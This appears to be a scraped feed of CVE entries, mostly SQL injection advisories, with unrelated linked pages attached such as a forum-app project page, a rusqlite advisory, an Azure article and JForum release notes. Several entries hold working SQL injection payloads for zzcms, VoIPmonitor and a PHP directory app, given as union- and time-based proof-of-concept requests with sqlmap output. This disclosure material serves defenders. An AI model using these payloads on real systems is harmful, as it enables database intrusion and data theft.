An issue was discovered in zzcms 2019. There is a SQL injection Vulnerability in /dl/dl_sendmail.php (when the attacker has dls_print authority) via a dlid cookie.

1.  user/dls\_print.php

0x01 Vulnerability (/user/dls\_print.php line 51 ~ 56)  

If index of ',' value in id parameter is not false sql will be  

When we check the query there is no single quote to id parameter. So We can inject  
any query with id parameter  

We can find there is no security filter for id parameter and it means we can inject Sql query via  
id parameter if we concat ',' value at the end of id parameter

0x02 payload  
give below "POC" value for post data in "/user/dls\_download.php"  
POC : union SQL injection  
menu1=%3Fb%3D123%26province%3D%26city%3D%26keyword%3D%26page\_size%3D2&FileExt=  
xls&sql=select+count%28\*%29+as+total+from+zzcms\_dl+where+classid%3D1+&chkAll=checkbox  
&id%5B%5D=1) union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,version(),0,1,2,3-- a,  

1.  user/dls\_download.php

0x01 Vulnerability (/user/dls\_download.php line 43 ~ 46)  

If index of ',' value in id parameter is not false sql will be  

When we check the query there is no single quote to id parameter. So We can inject  
any query with id parameter  

We can find there is no security filter for id parameter and it means we can inject Sql query via  
id parameter if we concat ',' value at the end of id parameter

0x02 payload  
give below "POC" value for post data in "/user/dls\_download.php"  
POC : union SQL injection  
menu1=%3Fb%3D123%26province%3D%26city%3D%26keyword%3D%26page\_size%3D2&FileExt=  
xls&sql=select+count%28\*%29+as+total+from+zzcms\_dl+where+classid%3D1+&chkAll=checkbox  
&id%5B%5D=1) union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,version(),0,1,2,3-- a,

3.  dl/dl\_sendmail.php

0x01 Vulnerability (/dl/dl\_sendmail.php line 69 ~ 73)  

If index of ',' value in COOKIE\[‘dlid’\] parameter is bigger than 0 sql will be  

When we check the query there is no single quote to COOKIE\[‘dlid’\] parameter. So We can inject  
any query with COOKIE\[‘dlid’\] parameter  

n var will get value via GET\[‘n’\] and if n var value is not 0 php does not make dlid COOKIE  
value. So We can inject any query if we give any value without 0 via GET\[‘n’\] parameter

0x02 payload  
give below "POC" value for cookie data in “/dl/dl\_sendmail.php?n=1234"  
POC : Time based sql injection  
COOKIE\[‘dlid’\] = 1) union select sleep(3)-- a,

4.  dl/dl\_sendsms.php

0x01 Vulnerability (/dl/dl\_sendsms.php line 73 ~ 77)  

If index of ',' value in COOKIE\[‘dlid’\] parameter is bigger than 0 sql will be  

When we check the query there is no single quote to COOKIE\[‘dlid’\] parameter. So We can inject  
any query with COOKIE\[‘dlid’\] parameter  

n var will get value via GET\[‘n’\] and if n var value is not 0 php does not make dlid COOKIE  
Value. So We can inject any query if we give any value without 0 via GET\[‘n’\] parameter

0x02 payload  
give below "POC" value for cookie data in “/dl/dl\_sendsms.php?n=1234"  
POC : Time based sql injection  
COOKIE\[‘dlid’\] = 1) union select sleep(3)-- a,

5.  admin/deluser.php

0x01 Vulnerability (/admin/deluser.php line 28 ~ 32)  

If index of ',' value in id parameter is bigger than 0 sql will be  

When we check the query there is no single quote to id parameter. So We can inject  
any query with id parameter  

We can find there is no security filter for id parameter and it means we can inject Sql query via  
id parameter if we concat ',' value at the end of id parameter

0x02 payload  
give below "POC" value for post data in “/admin/deluser.php "  
POC : union sql injection  
tablename=zzcms\_main&id\[0\]=1) union select 1234,@@version-- a,

6.  admin/dl\_sendmail.php

0x01 Vulnerability (/admin/dl\_sendmail.php line 32 ~ 36)  

If index of ',' value in id parameter is bigger than 0 sql will be  

When we check the query there is no single quote to id parameter. So We can inject  
any query with id parameter  

We can find there is no security filter for id parameter and it means we can inject Sql query via  
id parameter if we concat ',' value at the end of id parameter

0x02 payload  
give below "POC" value for post data in “/admin/dl\_sendmail.php "  
POC : union Time base sql injection  
id\[0\]=1) union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,sleep(3)-- a,

7.  admin/showbad.php

0x01 Vulnerability (/admin/showbad.php line 26 ~ 32)  

If index of ',' value in id parameter is bigger than 0 sql will be  

When we check the query there is no single quote to id parameter. So We can inject  
any query with id parameter  

We can find there is no security filter for id parameter and it means we can inject Sql query via  
id parameter if we concat ',' value at the end of id parameter

0x02 payload  
give below "POC" value for post data in “/admin/showbad.php?action=del "  
POC : Time base sql injection  
id\[0\]=2342342) || IF((1=1),sleep(3),2)-- a,

8.  admin/ztliuyan\_sendmail.php

0x01 Vulnerability (/admin/ztliuyan\_sendmail.php line 31 ~ 36)  

If index of ',' value in id parameter is bigger than 0 sql will be  

When we check the query there is no single quote to id parameter. So We can inject  
any query with id parameter  

We can find there is no security filter for id parameter and it means we can inject Sql query via  
id parameter if we concat ',' value at the end of id parameter

0x02 payload  
give below "POC" value for post data in “/admin/ztliuyan\_sendmail.php"  
POC : union Time base sql injection  
id\[0\]=2342342) union select 1,2,3,4,5,6,7,8,9,sleep(2)-- a,

CVE-2019-12352: zzcms 2019 SQL INJECTION LIST · Issue #5 · cby234/zzcms

VoIPmonitor WEB GUI up to version 24.61 is affected by SQL injection through the "api.php" file and "user" parameter.

sql injection on user parameter. since, api.php file doesnt need any authentication attacker can exploit this vulnerability without any valid session or credentials.

GET /voipmonitorpath/api.php?action=login&user=\[inject\_here\]&pass=trollz HTTP/1.1
Host: vulnerableinstance
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: \*/\*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 0
Connection: close

sqlmap result:

Parameter: #1\* (URI)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: http://vulnerableinstance:80/voipmonitorpath/api.php?action=login&user=' AND (SELECT 9158 FROM (SELECT(SLEEP(5)))Evax) AND 'jvDj'='jvDj&pass=trollz
\---
\[02:19:33\] \[INFO\] testing MySQL
\[02:20:22\] \[INFO\] confirming MySQL
web application technology: Nginx 1.14.2, PHP
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
banner: '10.3.29-MariaDB-1:10.3.29+maria~stretch'

cc: @cnbrkbolat & @R0h1rr1m

CVE-2021-41408: voipmonitor unauth sql injection

Online Discussion Forum Site 1 was discovered to contain a blind SQL injection vulnerability via the component /odfs/posts/view_post.php.

Submitted by oretnom23 on Monday, May 16, 2022 - 15:15.

****Introduction****

This simple project is entitled **Online Discussion Forum Site**. This is a web-based application project developed in **PHP** and **MySQL Database**. This simple project's main goal is to provide an online platform for an organization where they can discuss any topic that is related to the site or organization. The site allows users to post any topic under a certain topic category. Users can post comments on each posted published topic. The system user interface was developed with **Bootstrap Framework** and **AdminLTE Framework**. It also consists of user-friendly features and functionalities.

****About the Online Discussion Forum Site****

I developed this project using the following:

*   **XAMPP v3.3.0**
*   **PHP**
*   **MySQL Database**
*   **HTML**
*   **CSS**
*   **JavaScript**
*   **Ajax**
*   **jQuery**
*   **Bootstrap**
*   **Font Awesome**
*   **AdminLTE**

This **Online Discussion Forum Site** is accessible to anyone and site management. As I mentioned at beginning of this article, the project allows users to post or published certain topics. Each published topic is visible to the public and registered users. The system requires the users to register and log in with their credentials to gain access to posting topics and comments. This project also contains an Admin Panel Site where the site management can manage all the data on the system. This side of the project requires an administrator user credential to gain access to the features and functionalities. On this site, the management can overwrite, and delete users' posts and comments. The admin users also can create a new topic on this site. The Admin Users are the ones who are in charge of populating the topic category list. They can also update the system name, logo, etc.

****Features******User-Side**

*   **Login and Registration**
*   **Home Page**
    *   Display the Carousel
    *   List All Published Topics
    *   Search Published Topics
*   **Topic Categories Page**
    *   Lists All the Active Topic Categories
    *   Search Category
    *   Shows the Topic Category Description
*   **Add Post Page**
*   **My Post Page**
    *   List All the user Create Topics (Published/Unpublished)
    *   Search Created Topic
*   **Edit or Update Posted Topic**
*   **Comment Section**
*   **Delete Posted Topics**
*   **Delete Posted Comments**
*   **Update Account Details/Credentials**
*   **Logout**

**Admin-Side**

*   **Home Page**
    *   Display the summary and images.
*   **Category Management**
    *   Add new Category
    *   List All Categories
    *   View Category Details
    *   Edit/Update Category Details
    *   Delete Category
*   **Post Management**
    *   Create New Post
    *   List All Posts
    *   View Post Details
    *   Edit/Update Post Details
    *   Comment Section
    *   Delete Comments
    *   Delete Post
*   **User Management**
    *   Add New User
    *   List All Users
    *   View User Details
    *   Edit User Details
    *   Delete User Details
*   **Update System Information**
*   **Update Account Details/Credentials**
*   **Login and Logout**

The source code was developed only for educational purposes only. You can download the source code for free and modify it the way you wanted.

**System Snapshots of some Features******User Registration Page****

****Home Page****

****Topic Categories Page****

****Post List Page****

****Post Form Page****

****Post Details****

****Post's Comment Section****

****Admin Dashboard Page****

**How to Run ??**

****Requirements****

*   **Download** and **Install** any **local web server** such as **XAMPP.**
*   **Download** the provided source code **zip** file. (_download button is located below_)

****System Installation/Setup****

1.  **Enable** the **GD Library** in your **php.ini** file.
2.  **Open** your **XAMPP Control Panel** and start ****Apache**** and ****MySQL****.
3.  **Extract** the **downloaded source code **zip** file**.
4.  **Copy** the extracted source code folder and **paste** it into the **XAMPP's "htdocs" directory**.
5.  **Browse** the ****PHPMyAdmin**** in a **browser**. i.e. ****http://localhost/phpmyadmin****
6.  **Create** a **new database** naming ****odfs\_db****.
7.  **Import** the provided ****SQL**** file. The file is known as ****odfs\_db.sql**** located inside the **database** folder.
8.  **Browse** the **Online Discussion Forum Site** in a **browser**. i.e. ****http://localhost/odfs/****.

****Admin Default Access:****

Username: **admin**  
Password: **admin123**

****Sample User Access:****

Username: **mcooper**  
Password: **mcooper123**

****DEMO VIDEO****

That's it. You can now explore the features and functionalities of this **Online Discussion Forum Site** in **PHP**. I hope this will help you with what you are looking for and you'll find something useful for your future projects.

Explore more on this website for more **Free Source Codes** and **Tutorials**.

**Enjoy :)**

*   1378 views

CVE-2022-31296: Online Discussion Forum Site in PHP/OOP Free Source Code

The lifetime bound on several closure-accepting `rusqlite` functions (specifically, functions which register a callback to be later invoked by SQLite) was too relaxed. If a closure referencing borrowed values on the stack is was passed to one of these functions, it could allow Rust code to access objects on the stack after they have been dropped.

The impacted functions are:

- Under `cfg(feature = "functions")`: `Connection::create_scalar_function`, `Connection::create_aggregate_function` and `Connection::create_window_function`.
- Under `cfg(feature = "hooks")`: `Connection::commit_hook`, `Connection::rollback_hook` and `Connection::update_hook`.
- Under `cfg(feature = "collation")`: `Connection::create_collation`.

The issue exists in all `0.25.*` versions prior to `0.25.4`, and all `0.26.*` versions prior to 0.26.2 (specifically: `0.25.0`, `0.25.1`, `0.25.2`, `0.25.3`, `0.26.0`, and `0.26.1`).

The fix is available in versions `0.26.2` and newer, and also has been back-ported to `0.25.4`. As it does not exist in `0.24.*`, all affected versions should have an upgrade path to a semver-compatible release.


The lifetime bound on several closure-accepting rusqlite functions (specifically, functions which register a callback to be later invoked by SQLite) was too relaxed. If a closure referencing borrowed values on the stack is was passed to one of these functions, it could allow Rust code to access objects on the stack after they have been dropped.

The impacted functions are:

*   Under cfg(feature = "functions"): Connection::create_scalar_function, Connection::create_aggregate_function and Connection::create_window_function.
*   Under cfg(feature = "hooks"): Connection::commit_hook, Connection::rollback_hook and Connection::update_hook.
*   Under cfg(feature = "collation"): Connection::create_collation.

The issue exists in all 0.25.* versions prior to 0.25.4, and all 0.26.* versions prior to 0.26.2 (specifically: 0.25.0, 0.25.1, 0.25.2, 0.25.3, 0.26.0, and 0.26.1).

The fix is available in versions 0.26.2 and newer, and also has been back-ported to 0.25.4. As it does not exist in 0.24.*, all affected versions should have an upgrade path to a semver-compatible release.

**References**

*   rusqlite/rusqlite#1048
*   https://rustsec.org/advisories/RUSTSEC-2021-0128.html

GHSA-q89g-4vhh-mvvm: Incorrect Lifetime Bounds on Closures in `rusqlite`

By Owais Sultan
Microsoft is a global leader in cloud storage and data protection. They prove that even the most respected…
This is a post from HackRead.com Read the original post: How Data Landlords Put Their Tenants at Risk

****Microsoft is a global leader in cloud storage and data protection. They prove that even the most respected cloud databases offer weak security.****

Today’s microservice architecture is highly dependent on the fluid and interconnected transference of data. SQL is a coding language perfect for storing data in relational databases, rapidly and securely supplying data when asked. It’s also a highly reliable coding language, capable of maintaining the integrity of databases over the globe.

Unfortunately, the constant pressure to iterate and produce has forced many developers to rely on third-party platforms; cloud providers have also started over-optimizing, cramming multiple customers together on one cloud instance. This has opened up brand new attack surfaces within cloud data protection, as unknown and untrusted companies must rely only on thin walls of protection.

**The Importance of PostgreSQL**

PostgreSQL is the world’s most advanced open-source library for SQL, with a specific focus on stability, high availability, and scalability. Developed over 30 years ago, the database has the goal of streamlining and cleaning community-developed code. This is then published and re-usable with or without a commercial license. 

This SQL code makes use of cloud-stored data; it only makes sense to store the code itself also on a cloud. This is where the Microsoft Azure platform is a godsend for many development firms; this platform is a (mostly) secure and managed database.

Cloud platform offerings are hassle-free foundations for applications and services. From this reliable foundation, app developers can rapidly design and create apps without the need to focus on nitty-gritty platform management_._ Microsoft offers the Azure Database for PostgreSQL service in three deployment variations: Single Server, Flexible Server, and Hyperscale. 

Cloud storage is beneficial in a number of major ways; scalability is an inherent strength of the cloud, as businesses will only need to pay enough for their own storage. Any storage will require a set amount of computational power; however, from a business perspective, flexibility flies in the face of reliability.

Microsoft fixes this with an ingenious method: given a set amount of server space, multiple clients can ‘inhabit’ this cloud, optimizing both customer demand and computation power.

**How Multi-Tenancy Architecture Works**

This multi-tenant layout sees different customers share system resources like storage, memory, and operating systems. Bundled together, these are all powered by a single set of physical hardware. 

Customer instances are separated by virtualization. The second layer of software encompasses the cloud environment, simulating hardware functionality to create a singular virtual computer system. There is one instance per client allowing for logical separation, and further helping to separate and track resource usage. 

**The PostgreSQL Attack**

In 2022, researchers discovered a critical vulnerability within the PostgreSQL Microsoft Azure platform.

When validating the authorization of a server and validating a connection, Azure’s source code checks the client’s certificate. It searches for a predefined common name. However, an oversight in the validation process meant that slipping in extra characters between the beginning and end of the fake certificate allowed access anyway.

The next step in the attacker’s to-do list is to establish which elements of a user’s database contain valuable info.

External to every client’s virtual environment, the clients all share a level 3 memory cache. Put simply, this mirrors the system memory across all client instances. An attacker could manipulate this cache to a known state. When a user logs on and uses the platform, the attacker can then look at the changes present in the cache, pinpoint it to a victim’s activity, and trace it back to where the user stores their sensitive data.

With a chain of attack suitably established, the final step is to find a victim.

The researchers have clarified that this attack only works against databases from the same region. However, finding the region of a pre-existing database is a relatively easy task; it’s evident from the IP address of its hosting server. Once this is known, it’s a relatively simple task to set up an account and start exploiting other users on the same cloud.

So, how can you protect yourself from malicious neighbors?

**Keeping Your Cloud Secure **

Whereas many coding libraries are publicly shared and open source, multi-million-dollar companies have no such obligation to publish their own code and architectures. Though this makes complete sense from a patent perspective, it comes at the detriment of your own security choices.

More researchers are beginning to ask cloud providers to give a better overview of their isolation architectures; always ask for relevant documentation before choosing a provider.

CVE provides a global documentation process for vulnerabilities and misconfigurations. When code is mishandled and exploited, it is given a CVE ID. This aids in researching, tracking, and ultimately preventing those vulnerabilities.

However, the issue with cloud providers is that software security flaws and misconfigurations do not receive CVE IDs. This makes it far more difficult to establish a cloud provider’s track record. There is good news on this front, however – a hard-working team of security professionals is creating a Github database of cloud security incidents. 

If you’re already in a multi-year contract with a cloud provider, then your options are slightly more limited. It’s important to remember that relying on the properties of a single program, or virtual machine is not sufficient; vulnerability in any component of service can compromise the security of the entire service. The bottom line is that – if data is exposed to the internet – then it is vulnerable.

Managing this risk is an important part of operating a secure company. 

Any critical data – that is, data that could do irreparable damage if stolen from your organization – should not be stored in any third-party cloud environment; multi-tenant or not. Instead of relying on an un-transparent third party’s architecture, critical data should be stored on an ultra-secure local server. This should have no direct access to the public internet.

For your uncritical data, cloud storage is a convenient and scalable solution, as long as you put further barriers between any attackers and your data. Encrypting your data once it’s in the cloud means that – even if an attacker does gain access – the data is functionally useless for them.

How Data Landlords Put Their Tenants at Risk

JForum v2.8.0 was discovered to contain a Cross-Site Request Forgery (CSRF) via http://target_host:port/jforum-2.8.0/jforum.page, which allows attackers to arbitrarily add admin accounts.

**New and changed features in JForum 2.8.1**

Information about upgrading from JForum version 2.8.0 to 2.8.1 can be found at Upgrading to JForum 2.8.1

**New Features and fixes**

*   fixed CSRF vulnerability
*   more control over image attachments from _Configurations_ page
*   various font and background colors can be configured from the _Configurations_ page
*   optimize _Recent Topics_ and _Hot Topics_ for large installations
*   fixed issue where the _last visited time_ on the forum home page was not actually reflecting that, but the time of the last session start
*   switch Google Analytics integration from analytics.js to gtag.js

**Libraries**

*   updated Apache Lucene from 8.10.1 to 8.11.1
*   updated Apache PDFBox from 2.0.24 to 2.0.26
*   updated EventBus from 3.2.0 to 3.3.1
*   updated JDOM2 from 2.0.6 to 2.0.6.1
*   updated JSoup from 1.14.3 to 1.15.1
*   updated Microsoft SQLServer driver from 9.4.0 to 10.2.1
*   updated MySQL driver from 8.0.27 to 8.0.29
*   updated Oracle driver from 21.3.0.0 to 21.5.0.0
*   updated PrettyTime from 5.0.2 to 5.0.3
*   updated PostgreSQL driver from 42.3.1 to 42.3.6
*   updated slf4j from 1.7.32 to 1.7.36
*   added YAUAA 7.1.0 (instead of pieroxy) for user agent detection
*   updated several Maven plugins

**New Configurations**

Entry name

Default value

Description

attachments.images.thumb.hover.show

false

Whether to show the full-sized image as a popup when hovering over an image thumbnail. This causes all images to be downloaded in full size - which may not be wanted.

color.orange

#ffa34f

Orange font color

color.darkblue

#01336b

Dark blue font color

color.lightgray

#dee3e7

Light gray background color

color.verylight

#fafafa

Very light background color

color.quitelight

#f7f7f7

Quite light background color

**Database Schema**

These indexes speed up operations on large JForum installation, but are optional.

CREATE INDEX idx\_topics\_views ON jforum\_topics(topic\_views);  
CREATE INDEX idx\_topics\_replies ON jforum\_topics(topic\_replies);

CVE-2022-26173: JForum2 / Wiki / NewFeatures281

Victor CMS 1.0 is vulnerable to SQL injection via c_id parameter of admin_edit_comment.php, p_id parameter of admin_edit_post.php, u_id parameter of admin_edit_user.php, and edit parameter of admin_update_categories.php.

CVE-2020-35597

NOKIA VitalSuite SPM 2020 is affected by SQL injection through UserName'.

Something went wrong, but don’t fret — let’s give it another shot.

CVE-2021-41487

Directory Management System v1.0 was discovered to contain a SQL injection vulnerability via the fullname parameter in add-directory.php.

\> \[Suggested description\]

\> Directory Management System v1.0 was discovered to contain a SQL

\> injection vulnerability via the fullname parameter in

\> add-directory.php.

\>

\> ------------------------------------------

\>

\> \[Vulnerability Type\]

\> SQL Injection

\>

\> ------------------------------------------

\>

\> \[Vendor of Product\]

\> phpgurukul

\>

\> ------------------------------------------

\>

\> \[Affected Product Code Base\]

\> Directory Management System - 1.0

\>

\> ------------------------------------------

\>

\> \[Affected Component\]

\> add-directory.php

\>

\> ------------------------------------------

\>

\> \[Attack Type\]

\> Remote

\>

\> ------------------------------------------

\>

\> \[Impact Information Disclosure\]

\> true

\>

\> ------------------------------------------

\>

\> \[Attack Vectors\]

\> POST /dms/admin/add-directory.php HTTP/1.1

\> Host: ip

\> User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:100.0) Gecko/20100101 Firefox/100.0

\> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,\*/\*;q=0.8

\> Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

\> Accept-Encoding: gzip, deflate

\> Content-Type: application/x-www-form-urlencoded

\> Content-Length: 178

\> Connection: close

\> Cookie: PHPSESSID=eml4bgiglhno5kgmjj8uld5qgs

\> Upgrade-Insecure-Requests: 1

\>

\> fullname=database()','$profession','$email','$mobilenumber','$address',database(),'$admsta')%23&profession=aaaa&email=aaa%40aaa.aaa&mobilenumber=aaa&city=aaa&address=aaaa&submit=

\>

\> ------------------------------------------

\>

\> \[Discoverer\]

\> laotun

\>

\> ------------------------------------------

\>

\> \[Reference\]

\> http://directory.com

\> http://phpgurukul.com

Use CVE-2022-31384.

CVE-2022-31384: POC/CVE-2022-31384.txt at main · laotun-s/POC

Directory Management System v1.0 was discovered to contain a SQL injection vulnerability via the searchdata parameter in search-dirctory.php.

Tag

#sql